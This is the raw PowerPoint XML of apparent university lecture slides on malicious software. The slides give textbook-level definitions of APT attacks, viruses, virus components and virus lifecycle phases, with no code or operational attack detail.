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5" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="272" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="280"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kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Comic Sans M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0" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="103" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="-456" y="-88"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="102" d="100"/>
        <a:sy n="102"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274601-3C15-C849-934A-D3B51362CB3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/14/16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9E5B1D-BE54-7545-ABE7-B8CCFC976C08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872355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6CA864-7BE4-664F-B69A-F275AE58EDDE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/14/16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BD1ED8-3C9F-0749-91CF-4C82F25CEE19}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11926729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916556-F221-6B4A-941B-C4D5E89A5658}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158507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28CDB4-73E0-F449-8197-52C89BA2DCA4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206771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9DF34A-A5BC-3C4A-95B7-3236D14BB8F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179595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9D3503-C020-CD4B-BF6D-3DAB6B076F74}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25137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F09D-1D5D-E640-9131-07ADF02E5DC4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204675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2923BF-0F1B-BD4D-9C7C-B519A1AF0029}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152357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1F3FB7-4444-5641-9266-5DEED5BD2EE1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333898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8F59828-B2EB-2A4C-A94D-BEA8D363E83B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20061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B3A76C-7820-154F-80CA-E04A29777C4C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188047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7906BB-6978-DD4D-8858-DAC14037CA60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426476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843C49-99BB-A24A-B791-488380824CD9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25597814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39D57118-4C32-8A46-AAC1-B8BB302803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Comic Sans MS"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Comic Sans M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Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>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ActiveX" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Java_(software_platform)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Download" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Computer_virus" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Spyware" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Crimeware" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Executable_progra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4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Malicious Software (Malware)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4191000"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Chien-Chung Shen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>@udel.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Aim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Varies from theft of intellectual property or security and infrastructure related data to the physical disruption of infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Techniques used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Spear-phishing email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Drive-by-downloads from selected compromised websites likely to be visited by personnel in the target organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Intent:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>To infect the target with sophisticated malware with multiple propagation mechanisms and payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Once they have gained initial access to systems in the target organization a further range of attack tools are used to maintain and extend their access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414661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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Piece of software that infects programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1252538" lvl="1" indent="-393700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Modifies them to include a copy of the virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1252538" lvl="1" indent="-393700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Replicates and goes on to infect other content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1252538" lvl="1" indent="-393700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Easily spread through network environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>When attached to an executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>program, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>a virus can do anything that the program is permitted to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1252538" lvl="1" indent="-393700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Executes secretly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>when the host program is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Specific to operating system and hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1252538" lvl="1" indent="-393700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Takes advantage of their details and weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60806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 Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nfection mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Means by which a virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spreads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>propagates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Also referred to as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>infection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>vector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What the virus does (besides spreading)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>May involve damage or benign but noticeable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trigger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Event or condition that determines when the payload is activated or delivered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sometimes known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>logic bomb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="791239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Lifetime of Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8382000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dormant phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Virus is idle; will eventually be activated by some event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Propagation phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Virus place a copy of itself into other program or into certain system areas of disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The copy may not be identical to the propagating version; virus often morph to evade detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Each infected program will now contain a clone of the virus which will itself enter propagation phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Triggering phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virus is activated to perform the function for which it was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intended</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Execution phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The function is performed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391611695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Virus Logic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="f1.pdf"/>
          <p:cNvPicPr>
